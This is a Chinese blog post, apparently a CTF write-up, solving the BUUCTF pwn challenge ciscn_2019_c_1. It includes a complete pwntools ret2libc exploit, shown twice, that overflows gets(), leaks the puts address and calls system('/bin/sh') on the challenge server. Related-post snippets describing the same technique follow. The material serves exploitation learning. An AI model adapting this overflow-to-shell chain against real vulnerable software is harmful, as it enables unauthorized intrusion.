ciscn_2019_c_1[BUUCTF]

于 2024-05-03 23:27:39 发布
阅读量613 收藏 4
点赞数 19
文章标签: c语言 开发语言 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/moonlightsunshin/article/details/138426955
版权

三板斧

拿到题先三板斧hecksec --file=ciscn_2019_c_1看保护开启了NX优先考虑ROP但是关闭了PIE则可能存在缓冲区溢出

IDA查看

发现gets函数存在溢出

查看堆栈窗口得到缓冲区大小 构造0x50+0x8即可溢出

但是程序中没有直接可以用的system函数所以需要我们自己构造ROP链通过gets函数泄露出libc基址构造payload来泄露libc

在amd64架构下参数通过rdi传递0x400c83就是我们需要pop_rdi的地址

获得/bin/sh地址

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',log_level='debug')
elf=ELF("./ciscn_2019_c_1")
p=process("./ciscn_2019_c_1")
p=remote('node5.buuoj.cn',29553)
enc_input_addr=0x00000000004009A0 
pop_rdi_ret=0x0000000000400c83
plt=elf.plt['puts']#获取put在plt地址
got=elf.got['puts']#获取put在got地址
main_addr = elf.symbols['main']
payload= b'a'*(0x50+0x8)+p64(pop_rdi_ret)+p64(got)+p64(plt)+p64(enc_input_addr)
p.sendline(b'1')
p.sendlineafter(b'Input your Plaintext to be encrypted\n',payload)#等待指定的字符串
p.recvlines(2)#接受两行数据
addr=u64(p.recv(6).ljust(0x8,b"\x00"))#接受数据0x填充
libc=LibcSearcher("puts",addr)
libcbase=addr-libc.dump("puts")#返回libc基址
system_addr=libcbase+libc.dump("system") # system地址 = libc基址+system偏移
shellcode=libcbase+libc.dump("str_bin_sh")#得到/bin/sh地址
print(shellcode)

  得到   /bin/sh的地址  

继续构造payload

完整exp

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',log_level='debug')
elf=ELF("./ciscn_2019_c_1")
p=process("./ciscn_2019_c_1")
p=remote('node5.buuoj.cn',29553)
enc_input_addr=0x00000000004009A0 
pop_rdi_ret=0x0000000000400c83
plt=elf.plt['puts']#获取put在plt地址
got=elf.got['puts']#获取put在got地址
main_addr = elf.symbols['main']
payload= b'a'*(0x50+0x8)+p64(pop_rdi_ret)+p64(got)+p64(plt)+p64(enc_input_addr)
p.sendline(b'1')
p.sendlineafter(b'Input your Plaintext to be encrypted\n',payload)#等待指定的字符串
p.recvlines(2)#接受两行数据
addr=u64(p.recv(6).ljust(0x8,b"\x00"))#接受数据0x填充
libc=LibcSearcher("puts",addr)
libcbase=addr-libc.dump("puts")#返回libc基址
system_addr=libcbase+libc.dump("system") # system地址 = libc基址+system偏移
shellcode=libcbase+libc.dump("str_bin_sh")#得到/bin/sh地址
print(shellcode)
ret=0x00000000004006b9
payload= b'a'*(0x50+0x8)+p64(ret)+p64(pop_rdi_ret)+p64(shellcode)+p64(system_addr)
p.sendlineafter(b'Input your Plaintext to be encrypted\n',payload)
p.interactive()

如果不行就换一个libc

moonlightsunshin
关注
ciscn_2019_c_1 1
qq_41560595的博客
10-06 4405
payload构造 此题和之前总结的ret2libc题型相似,但是那个题是32位的,而此题是64位的。因此,payload的构造方式不一样。 payload1 此时的esp正处于函数返回的状态,即从上往下走。 在64位中,有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。当esp指向pop rdi ;ret时,rip指向puts_got,puts_got所保存的真实地址就能弹到rdi上。以上是准备参数。 再往下就是是固定格式“函数地址+返回地址+参数”的体现: 利用puts_plt作为函数地
BUUCTF ciscn_2019_c_1(ret2libc)
weixin_45441024的博客
01-04 419
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
BUUCTF ciscn_2019_c_1
、moddemod
06-01 1276
跑一下程序,大致流程是 到现在程序就基本分析完成,接下来需要构造rop泄露libc地址然后利用system等函数获得shell 我们首先要获得libc的基地址,可以通过puts函数入手,这里解释一下为什么通过puts函数而不通过其他函数,因为puts函数在我们进入encrypt函数之前已经调用了很多次了,对于每一个动态链接而言,第一次调用完成以后,就修正了.got表中的对应的puts函数的地址,所以我们可以通过puts函数泄露。 from pwn import * from LibcSearc.
ciscn_2019_c_1
怪味巧克力的博客
07-18 599
0x01 检查文件,64位 检查开启的保护情况 开启了NX保护 0x02 IDA静态分析 在主函数这里并没有常见的gets栈溢出,尝试再这里面的子函数找找,发现了encrypt函数,进去查看 发现这个变量x的自增是由空间大小限制的,猜测这里会出现栈溢出漏洞,写出exp尝试溢出 0x03 exp: from pwn import * from LibcSearcher import * content = 0 context(os='linux', arch='amd64', log_level='
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4080
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 5872
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2622
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
日行一PWN之ciscn_2019_c_1不给出libc题型
m0_57221101的博客
06-02 800
BUUCTF ciscn 依旧使用buu提供的题这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本以及本次的64位程序,在传参上和32位程序的一些不同闲话少叙,后面需要的知识点我们后面再学,我们便分析边聊checksec分析64位的程序,只有数据段免执行保护。地址为0000000000400B28我们可以通过telnet连接一下看看她在干什么可以看到是一个简单的输入判断
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1329
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
buuctfciscn_2019_c_1
最新发布
weixin_54452942的博客
04-18 583
通俗易懂
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值